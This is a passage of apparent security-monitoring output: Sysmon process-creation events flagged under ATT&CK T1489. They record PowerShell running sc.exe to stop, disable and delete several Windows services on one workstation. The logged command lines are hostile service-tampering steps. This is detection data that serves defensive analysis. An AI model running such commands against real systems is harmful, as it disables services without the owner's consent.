-NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.634",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.208 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001008d91d00} +ProcessId: 7984 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Natimmonal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.210665700Z"",""eventRecordID"":""2330"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.208\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001008d91d00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service 
Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Natimmonal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.208"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001008d91d00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Natimmonal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.619",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.193 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00103ed81d00} +ProcessId: 1408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Natimmonal Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.200127800Z"",""eventRecordID"":""2329"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.193\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00103ed81d00}\r\nProcessId: 1408\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Natimmonal Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.193"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00103ed81d00}"",""processId"":""1408"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Natimmonal Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.591",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.168 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00106ed61d00} +ProcessId: 5556 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaaal +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.172053400Z"",""eventRecordID"":""2327"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.168\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00106ed61d00}\r\nProcessId: 5556\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaaal\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:00.168"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00106ed61d00}"",""processId"":""5556"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaaal"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.527",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.118 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001082d31d00} +ProcessId: 6012 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop National +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop National",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.122200900Z"",""eventRecordID"":""2324"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.118\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001082d31d00}\r\nProcessId: 6012\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop National\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.118"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001082d31d00}"",""processId"":""6012"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop National"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.490",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.089 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010ecd11d00} +ProcessId: 2580 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Sougoudl 
+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.091510500Z"",""eventRecordID"":""2322"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.089\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010ecd11d00}\r\nProcessId: 2580\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.089"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010ecd11d00}"",""processId"":""2580"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.474",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.074 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001023d11d00} +ProcessId: 2116 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Sougoudl +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.076634400Z"",""eventRecordID"":""2321"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.074\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001023d11d00}\r\nProcessId: 2116\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Sougoudl\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.074"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001023d11d00}"",""processId"":""2116"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Sougoudl"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.292",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 
12:50:00.011 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00102ece1d00} +ProcessId: 2280 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WmdnPnSN +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 